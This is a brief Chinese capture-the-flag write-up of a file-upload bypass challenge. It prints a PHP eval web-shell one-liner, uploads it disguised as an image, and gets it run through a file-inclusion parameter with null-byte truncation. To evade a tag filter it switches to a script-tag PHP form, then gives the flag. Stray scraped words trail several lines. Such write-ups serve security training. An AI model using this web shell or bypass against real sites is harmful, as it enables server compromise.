虽然是一道上传绕过,但是绕出了新姿式,记录一下php
打开题目发现有一个上传文件的地方html
直接上传图片一句话web
一句话的内容是:spa
<?php eval($_POST['Ambrose']); ?>
上传成功显示图片IDcode
拿着这个ID去找图片路径htm
经过查看图片信息得知图片在uploads/1532755715.jpg接下来就是链接菜刀,但是菜刀连不上,看了其余师傅的wp多是绕过了菜刀。blog
看了wp发现这还有个文件包含图片
构造payload:ip
?page=uploads/1532755715.jpg
返回class
它会在文件后面再加上.php,因此用到00截断
?page=uploads/1532755715.jpg
返回:
猜是过滤了一句话中的<?之类的
这里推荐个连接:http://www.freebuf.com/articles/web/9396.html
换个方式写一句话:
<script language="php">phpinfo();</script>
上传:
CTF{upl0ad_sh0uld_n07_b3_a110wed}